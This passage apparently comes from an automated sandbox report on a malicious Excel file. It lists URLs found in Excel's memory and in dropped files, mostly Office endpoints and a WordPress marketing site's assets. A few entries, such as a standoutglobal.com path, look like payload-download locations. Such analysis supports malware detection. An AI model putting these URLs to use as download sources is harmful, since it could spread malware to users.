    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.ai)
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airl7
    Source: EXCEL.EXE, 00000001.00000003.421637044.0000000015A61000.00000004.00000001.sdmpString found in binary or memory: https://standoutglobal.com/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://standoutglobal.com/2/MWpqeVgZ/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://standoutglobal.com/2/MWpqeVgZ/A
    Source: EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://standoutglobal.com/wp-json/
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com6
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com;
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comQ
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comj
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comq
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileM3g
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://tasks.office.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.comw
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EXCEL.EXE, 00000001.00000003.421917396.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384312092.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461632649.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435017611.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491604378.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456171717.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439337436.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580947514.0000000013079000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/
    Source: EXCEL.EXE, 00000001.00000003.438879530.0000000015A60000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433112706.0000000015A64000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.457435159.0000000015A51000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.458744854.0000000015A55000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581811802.0000000015A64000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382043441.0000000015A64000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.493845933.0000000015A51000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.459293250.0000000015A55000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455490275.0000000015A5C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421637044.0000000015A61000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing/$s
    Source: EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing/LMEM8H
    Source: EXCEL.EXE, 00000001.00000003.382185365.0000000015AE1000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing/RRC:
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-cdmx/
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-guadalajara/
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-monterrey/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/auditorias-y-optimizacion-de-camp
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-e
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-adsense/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-youtube/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/digital-partner-incubadora-de-neg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-el-sector-salud/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-cons
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-startups/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/transformacion-de-empresas/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/amazon-seo/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizati
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/crm/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/emailing/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/google-merchant-center/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/pagos-online/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-shopify/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-wordpres
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tiendas-en-facebook-e-inst
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/amazon-seo/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/conversion-rate-optimization/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/crm/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/emailing/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/google-merchant-center/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/pagos-online/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-magento/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-shopify/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-wordpress-woocomme
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tiendas-en-facebook-e-instagram/
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/branding/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-editorial/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-grafico/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-web-ux/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/fotografia-y-edicion/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/automatizacion-de-
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-apli
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-mega
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-pagi
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-tien
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/creacion-de-con
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/estrategias-en-
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/facebook-ads/
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/google-ads-adwo
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inbound-marketi
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inteligencia-de
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digi
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/seo-posicionami
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/blog/
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/comments/feed/
    Source: EXCEL.EXE, 00000001.00000003.438879530.0000000015A60000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433112706.0000000015A64000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.457435159.0000000015A51000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.458744854.0000000015A55000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581811802.0000000015A64000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382043441.0000000015A64000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.493845933.0000000015A51000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.459293250.0000000015A55000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455490275.0000000015A5C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421637044.0000000015A61000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing/dr
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/feed/
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.2
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.0.2
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/lottie/lottie.min.js?ver=5.6.6
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.mi
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.c
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?v
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/fonts/style.min.css?ver=3.
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/js/happy-addons.min.js?ver
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/AE.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.png
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/apple_android.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/elementor.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/figma.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/framer.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-facebook.png
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-google-adwords.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-instagram.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-youtube.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/microsoft.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/webflow.svg
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1536x522.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1568x533.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-2048x696.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-768x261.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/global.css?ver=1637592552
